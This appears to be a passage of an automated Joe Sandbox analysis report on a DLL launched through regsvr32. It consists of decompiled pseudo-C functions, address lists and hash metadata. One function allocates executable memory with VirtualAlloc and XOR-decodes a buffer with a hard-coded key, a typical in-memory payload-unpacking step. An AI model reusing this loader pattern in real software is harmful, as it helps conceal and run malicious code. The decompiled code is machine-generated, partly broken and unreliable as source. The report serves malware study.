                                                                                                        • Instruction ID: 10d1402b11f9a49ac1a16e41d57aaceb0cd5ac246c02fae63d94712b06c4edd1
                                                                                                        • Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
                                                                                                        • Instruction Fuzzy Hash: FC510F2261DB9985DA61EB51FC5137AA3A1FBC9B81F500136EACD87B9ACF3DD400CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28901910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t32;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				long long* _t49;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((_a16 & 0x000000ff) != 0) goto 0x28901930;
                                                                                                        				goto 0x289019f1;
                                                                                                        				E00007FFC7FFC28902150(__rax, _a8);
                                                                                                        				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x289019f1;
                                                                                                        				E00007FFC7FFC28902190(_a8);
                                                                                                        				_t47 =  *((intOrPtr*)(__rax));
                                                                                                        				_v40 = _t47;
                                                                                                        				E00007FFC7FFC28902BC0(E00007FFC7FFC28902190(_a8), _t47);
                                                                                                        				_v32 = _t47;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				_t32 = E00007FFC7FFC28902BD0(_t47, _v32);
                                                                                                        				if (_a24 <= 0) goto 0x289019bd;
                                                                                                        				E00007FFC7FFC28902C00(_t32, _v40);
                                                                                                        				_v24 = _t47;
                                                                                                        				E00007FFC7FFC28902190(_a8);
                                                                                                        				E00007FFC7FFC289011E0(_t47, _v24, _a24);
                                                                                                        				E00007FFC7FFC28902150(_t47, _a8);
                                                                                                        				_t49 =  *_t47 + 1;
                                                                                                        				_v16 = _t49;
                                                                                                        				E00007FFC7FFC28901850(_a8);
                                                                                                        				E00007FFC7FFC28902100(_t49, _v40, _v16); // executed
                                                                                                        				E00007FFC7FFC28902150(_t49, _a8);
                                                                                                        				 *_t49 = 0xf;
                                                                                                        				return E00007FFC7FFC289023A0(_t49, _a8, _a24);
                                                                                                        			}










                                                                                                        0x7ffc28901910
                                                                                                        0x7ffc28901915
                                                                                                        0x7ffc28901919
                                                                                                        0x7ffc28901929
                                                                                                        0x7ffc2890192b
                                                                                                        0x7ffc28901935
                                                                                                        0x7ffc2890193e
                                                                                                        0x7ffc28901949
                                                                                                        0x7ffc2890194e
                                                                                                        0x7ffc28901951
                                                                                                        0x7ffc28901963
                                                                                                        0x7ffc28901968
                                                                                                        0x7ffc28901972
                                                                                                        0x7ffc28901982
                                                                                                        0x7ffc2890198d
                                                                                                        0x7ffc28901994
                                                                                                        0x7ffc28901999
                                                                                                        0x7ffc289019a3
                                                                                                        0x7ffc289019b8
                                                                                                        0x7ffc289019c2
                                                                                                        0x7ffc289019ca
                                                                                                        0x7ffc289019cd
                                                                                                        0x7ffc289019d7
                                                                                                        0x7ffc289019ec
                                                                                                        0x7ffc289019f6
                                                                                                        0x7ffc289019fb
                                                                                                        0x7ffc28901a15

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 2899389904-0
                                                                                                        • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction ID: 329217ae5c6157f03290426eaf2cb4da1b15e74a104300142ca02dfe3952ddf0
                                                                                                        • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction Fuzzy Hash: BD21E322A1CA9581DA51FB92FC5127EA3A0FBC9BD1F000036FA8D87796CE6DD440CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00007FFC7FFC289013A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                        				void* _v16;
                                                                                                        				signed long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				signed int _v40;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if (_a16 - 0xffffffff <= 0) goto 0x289013cd;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_v24 = _a16 * _a24;
                                                                                                        				if (_v24 - 0x1000 < 0) goto 0x28901475;
                                                                                                        				_v40 = _a8;
                                                                                                        				if ((_v40 & 0x0000001f) == 0) goto 0x28901409;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_v16 = _v40 - 8;
                                                                                                        				_v32 =  *_v16;
                                                                                                        				if (_v32 - _v40 < 0) goto 0x28901435;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				if (_v40 - _v32 - 8 >= 0) goto 0x28901450;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				if (_v40 - _v32 - 0x27 <= 0) goto 0x2890146b;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_a8 = _v32;
                                                                                                        				0x28904184(); // executed
                                                                                                        				return __eax / _a24;
                                                                                                        			}







                                                                                                        0x7ffc289013a0
                                                                                                        0x7ffc289013a5
                                                                                                        0x7ffc289013aa
                                                                                                        0x7ffc289013c6
                                                                                                        0x7ffc289013c8
                                                                                                        0x7ffc289013d8
                                                                                                        0x7ffc289013e6
                                                                                                        0x7ffc289013f1
                                                                                                        0x7ffc28901402
                                                                                                        0x7ffc28901404
                                                                                                        0x7ffc28901412
                                                                                                        0x7ffc2890141f
                                                                                                        0x7ffc2890142e
                                                                                                        0x7ffc28901430
                                                                                                        0x7ffc28901449
                                                                                                        0x7ffc2890144b
                                                                                                        0x7ffc28901464
                                                                                                        0x7ffc28901466
                                                                                                        0x7ffc28901470
                                                                                                        0x7ffc2890147a
                                                                                                        0x7ffc28901483

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                        • String ID:
                                                                                                        • API String ID: 3668304517-0
                                                                                                        • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction ID: 1d9f8d91d4260cbad3e29dafb939fed429b928be601c1548aae89f777ce951fd
                                                                                                        • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction Fuzzy Hash: 60213E26618B9885DA50EB59E88021EB3A4F788BA5F000636FADD47BF9DF3CD140CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC28919510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				signed int _t35;
                                                                                                        				signed int _t48;
                                                                                                        				long long _t63;
                                                                                                        				intOrPtr _t64;
                                                                                                        				void* _t66;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0;
                                                                                                        				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                        				_v16 = _t63;
                                                                                                        				_v32 = E00007FFC7FFC289091B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                        				_v36 = E00007FFC7FFC289091B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                        				_t35 = E00007FFC7FFC289091B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                        				r9d = _v32;
                                                                                                        				r8d = _v36 | _t35;
                                                                                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                        				_v24 = _t63;
                                                                                                        				if (_v24 != 0) goto 0x2891958f;
                                                                                                        				goto 0x289195f4;
                                                                                                        				_v40 = 0;
                                                                                                        				goto 0x289195a3;
                                                                                                        				_v40 = _v40 + 1;
                                                                                                        				if (_v40 - _a16 >= 0) goto 0x289195ef;
                                                                                                        				_t64 = _v40;
                                                                                                        				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                        				asm("cdq");
                                                                                                        				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                        				 *(_v24 + _v40) = _t48;
                                                                                                        				goto 0x28919599;
                                                                                                        				return _t48;
                                                                                                        			}
















                                                                                                        0x7ffc28919510
                                                                                                        0x7ffc28919514
                                                                                                        0x7ffc2891951d
                                                                                                        0x7ffc28919526
                                                                                                        0x7ffc2891952d
                                                                                                        0x7ffc2891953e
                                                                                                        0x7ffc2891954e
                                                                                                        0x7ffc28919559
                                                                                                        0x7ffc2891956e
                                                                                                        0x7ffc28919571
                                                                                                        0x7ffc28919578
                                                                                                        0x7ffc2891957e
                                                                                                        0x7ffc28919589
                                                                                                        0x7ffc2891958d
                                                                                                        0x7ffc2891958f
                                                                                                        0x7ffc28919597
                                                                                                        0x7ffc2891959f
                                                                                                        0x7ffc289195ab
                                                                                                        0x7ffc289195ad
                                                                                                        0x7ffc289195bb
                                                                                                        0x7ffc289195c3
                                                                                                        0x7ffc289195de
                                                                                                        0x7ffc289195ea
                                                                                                        0x7ffc289195ed
                                                                                                        0x7ffc289195f8

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                        • API String ID: 4275171209-3063897839
                                                                                                        • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction ID: 94020e8fa75c7423dc89a43cac493a4b34a3a7091bfeb4659a2634c9dafefd4c
                                                                                                        • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction Fuzzy Hash: 9321293261C6958AD764DB18E89022AB7A1F7C8746F40023AF68EC3B98DF7CD540CF18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC289012B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed long long _v32;
                                                                                                        				signed long long _v40;
                                                                                                        				void* _t40;
                                                                                                        				long long _t54;
                                                                                                        				signed long long _t57;
                                                                                                        				signed long long _t58;
                                                                                                        				void* _t60;
                                                                                                        
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v40 = 0;
                                                                                                        				if (_a8 != 0) goto 0x289012de;
                                                                                                        				goto 0x28901397;
                                                                                                        				_t42 = __eax % _a16;
                                                                                                        				if (0xffffffff - _a8 >= 0) goto 0x289012f8;
                                                                                                        				E00007FFC7FFC28904E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                        				_v32 = _a8 * _a16;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x2890137c;
                                                                                                        				if (_v32 - 0x1000 < 0) goto 0x2890137c;
                                                                                                        				_v24 = _v32 + 0x27;
                                                                                                        				_t54 = _v32;
                                                                                                        				if (_v24 - _t54 > 0) goto 0x2890133b;
                                                                                                        				E00007FFC7FFC28904E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                        				E00007FFC7FFC28903D6C(_t54, _v24); // executed
                                                                                                        				_v16 = _t54;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                        				_v40 = _t57;
                                                                                                        				_t58 = _t57 * 0xffffffff;
                                                                                                        				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                        				goto 0x28901392;
                                                                                                        				_t40 = E00007FFC7FFC28903D6C(_t58, _v32);
                                                                                                        				_v40 = _t58;
                                                                                                        				E00007FFC7FFC28909764();
                                                                                                        				return _t40;
                                                                                                        			}












                                                                                                        0x7ffc289012b0
                                                                                                        0x7ffc289012b5
                                                                                                        0x7ffc289012ba
                                                                                                        0x7ffc289012c3
                                                                                                        0x7ffc289012d2
                                                                                                        0x7ffc289012d9
                                                                                                        0x7ffc289012e7
                                                                                                        0x7ffc289012f1
                                                                                                        0x7ffc289012f3
                                                                                                        0x7ffc28901303
                                                                                                        0x7ffc2890130f
                                                                                                        0x7ffc2890131a
                                                                                                        0x7ffc28901325
                                                                                                        0x7ffc2890132a
                                                                                                        0x7ffc28901334
                                                                                                        0x7ffc28901336
                                                                                                        0x7ffc28901340
                                                                                                        0x7ffc28901345
                                                                                                        0x7ffc2890134c
                                                                                                        0x7ffc2890135a
                                                                                                        0x7ffc2890135e
                                                                                                        0x7ffc28901368
                                                                                                        0x7ffc28901376
                                                                                                        0x7ffc2890137a
                                                                                                        0x7ffc28901381
                                                                                                        0x7ffc28901386
                                                                                                        0x7ffc2890138d
                                                                                                        0x7ffc2890139b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction ID: cf436524c6cc56255e73c7e407988f91b1b3a7c36f441fad3a82d06147a7d058
                                                                                                        • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction Fuzzy Hash: B621212251CB9981D6609B19E84032EB7A4FB887A5F044336F6ED46BE8DF7DD190CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC2890D748(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
                                                                                                        				void* _t25;
                                                                                                        				signed long long _t45;
                                                                                                        				signed long long _t47;
                                                                                                        				long long _t62;
                                                                                                        				signed long long _t63;
                                                                                                        				signed long long _t70;
                                                                                                        				void* _t71;
                                                                                                        				WCHAR* _t75;
                                                                                                        
                                                                                                        				_t45 = _t70;
                                                                                                        				 *((long long*)(_t45 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t45 + 0x10)) = _t62;
                                                                                                        				 *((long long*)(_t45 + 0x18)) = __rsi;
                                                                                                        				 *((long long*)(_t45 + 0x20)) = __rdi;
                                                                                                        				_t71 = _t70 - 0x40; // executed
                                                                                                        				GetEnvironmentStringsW(); // executed
                                                                                                        				if (_t45 != 0) goto 0x2890d778;
                                                                                                        				goto 0x2890d83b;
                                                                                                        				_t63 = _t45;
                                                                                                        				if ( *_t45 == 0) goto 0x2890d79d;
                                                                                                        				_t47 = (_t45 | 0xffffffff) + 1;
                                                                                                        				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x2890d784;
                                                                                                        				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x2890d780;
                                                                                                        				 *((long long*)(_t71 + 0x38)) = __rsi;
                                                                                                        				 *((long long*)(_t71 + 0x30)) = __rsi;
                                                                                                        				r9d = __ebp;
                                                                                                        				 *((intOrPtr*)(_t71 + 0x28)) = 0;
                                                                                                        				 *(_t71 + 0x20) = __rsi;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				if (0 != 0) goto 0x2890d7db;
                                                                                                        				FreeEnvironmentStringsW(_t75);
                                                                                                        				goto 0x2890d771;
                                                                                                        				E00007FFC7FFC2890AA18(_t47, 0); // executed
                                                                                                        				_t57 = _t47;
                                                                                                        				if (_t47 != 0) goto 0x2890d7f4;
                                                                                                        				_t25 = E00007FFC7FFC2890A9DC(_t47, 0);
                                                                                                        				goto 0x2890d7d0;
                                                                                                        				 *((long long*)(_t71 + 0x38)) = __rsi;
                                                                                                        				r9d = __ebp;
                                                                                                        				 *((long long*)(_t71 + 0x30)) = __rsi;
                                                                                                        				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
                                                                                                        				 *(_t71 + 0x20) = _t47;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				if (_t25 != 0) goto 0x2890d825;
                                                                                                        				E00007FFC7FFC2890A9DC(_t47, _t47);
                                                                                                        				goto 0x2890d82f;
                                                                                                        				E00007FFC7FFC2890A9DC(_t47, _t57);
                                                                                                        				return FreeEnvironmentStringsW(??);
                                                                                                        			}











                                                                                                        0x7ffc2890d748
                                                                                                        0x7ffc2890d74b
                                                                                                        0x7ffc2890d74f
                                                                                                        0x7ffc2890d753
                                                                                                        0x7ffc2890d757
                                                                                                        0x7ffc2890d75d
                                                                                                        0x7ffc2890d761
                                                                                                        0x7ffc2890d76f
                                                                                                        0x7ffc2890d773
                                                                                                        0x7ffc2890d778
                                                                                                        0x7ffc2890d77e
                                                                                                        0x7ffc2890d784
                                                                                                        0x7ffc2890d78c
                                                                                                        0x7ffc2890d79b
                                                                                                        0x7ffc2890d79d
                                                                                                        0x7ffc2890d7a5
                                                                                                        0x7ffc2890d7b4
                                                                                                        0x7ffc2890d7b7
                                                                                                        0x7ffc2890d7bd
                                                                                                        0x7ffc2890d7c4
                                                                                                        0x7ffc2890d7ce
                                                                                                        0x7ffc2890d7d3
                                                                                                        0x7ffc2890d7d9
                                                                                                        0x7ffc2890d7de
                                                                                                        0x7ffc2890d7e3
                                                                                                        0x7ffc2890d7e9
                                                                                                        0x7ffc2890d7ed
                                                                                                        0x7ffc2890d7f2
                                                                                                        0x7ffc2890d7f4
                                                                                                        0x7ffc2890d7f9
                                                                                                        0x7ffc2890d7fc
                                                                                                        0x7ffc2890d804
                                                                                                        0x7ffc2890d80d
                                                                                                        0x7ffc2890d812
                                                                                                        0x7ffc2890d819
                                                                                                        0x7ffc2890d81e
                                                                                                        0x7ffc2890d823
                                                                                                        0x7ffc2890d827
                                                                                                        0x7ffc2890d855

                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFC2890A08B), ref: 00007FFC2890D761
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC2890A08B), ref: 00007FFC2890D7D3
                                                                                                          • Part of subcall function 00007FFC2890AA18: RtlAllocateHeap.NTDLL(?,?,?,00007FFC2891040D,?,?,00000000,00007FFC2890D8B7,?,?,?,00007FFC2890A427,?,?,?,00007FFC2890A31D), ref: 00007FFC2890AA56
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC2890A08B), ref: 00007FFC2890D832
                                                                                                          • Part of subcall function 00007FFC2890A9DC: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9F2
                                                                                                          • Part of subcall function 00007FFC2890A9DC: GetLastError.KERNEL32(?,?,00000000,00007FFC2890F492,?,?,?,00007FFC2890F4CF,?,?,00000000,00007FFC2890F144,?,?,?,00007FFC2890F077), ref: 00007FFC2890A9FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentStrings$Free$AllocateErrorHeapLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2360715157-0
                                                                                                        • Opcode ID: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
                                                                                                        • Instruction ID: bb4233b4e0269dffb0b2eec9dc341e3a9e6fd7e3e228031591074ce02ba6755e
                                                                                                        • Opcode Fuzzy Hash: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
                                                                                                        • Instruction Fuzzy Hash: 4731C461A08B6A85E624BF2A6C4007A76A4FF44BD5F484236EE5E13BC5DF3EF051C358
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00007FFC7FFC28902970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed int _v16;
                                                                                                        				char _v48;
                                                                                                        				long long _v56;
                                                                                                        				signed long long _v64;
                                                                                                        				signed int _v72;
                                                                                                        				void* _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t39;
                                                                                                        				signed long long _t40;
                                                                                                        				signed long long _t61;
                                                                                                        
                                                                                                        				_t37 = __eflags;
                                                                                                        				_t36 = __edx;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v56 = 0xfffffffe;
                                                                                                        				_t39 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				_t40 = _t39 ^ _t61;
                                                                                                        				_v16 = _t40;
                                                                                                        				_v72 = 0;
                                                                                                        				E00007FFC7FFC28901760(__edx,  &_v48);
                                                                                                        				E00007FFC7FFC28901490(_t40, _a16);
                                                                                                        				_v64 = _t40;
                                                                                                        				E00007FFC7FFC289011A0(_a24);
                                                                                                        				E00007FFC7FFC28902CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                        				E00007FFC7FFC28902E90( &_v48, _a16);
                                                                                                        				E00007FFC7FFC28902E60( &_v48, _a24);
                                                                                                        				E00007FFC7FFC289016A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                        				_v72 = _v72 | 0x00000001;
                                                                                                        				return E00007FFC7FFC28903A70(E00007FFC7FFC28901540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                        			}













                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902970
                                                                                                        0x7ffc28902975
                                                                                                        0x7ffc2890297a
                                                                                                        0x7ffc28902983
                                                                                                        0x7ffc2890298c
                                                                                                        0x7ffc28902993
                                                                                                        0x7ffc28902996
                                                                                                        0x7ffc2890299b
                                                                                                        0x7ffc289029a8
                                                                                                        0x7ffc289029b3
                                                                                                        0x7ffc289029b8
                                                                                                        0x7ffc289029c5
                                                                                                        0x7ffc289029dd
                                                                                                        0x7ffc289029ec
                                                                                                        0x7ffc289029fe
                                                                                                        0x7ffc28902a0d
                                                                                                        0x7ffc28902a19
                                                                                                        0x7ffc28902a3d

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC289029C5
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC289029EC
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC289029FE
                                                                                                          • Part of subcall function 00007FFC289016A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC289016BC
                                                                                                          • Part of subcall function 00007FFC28901540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC28901567
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
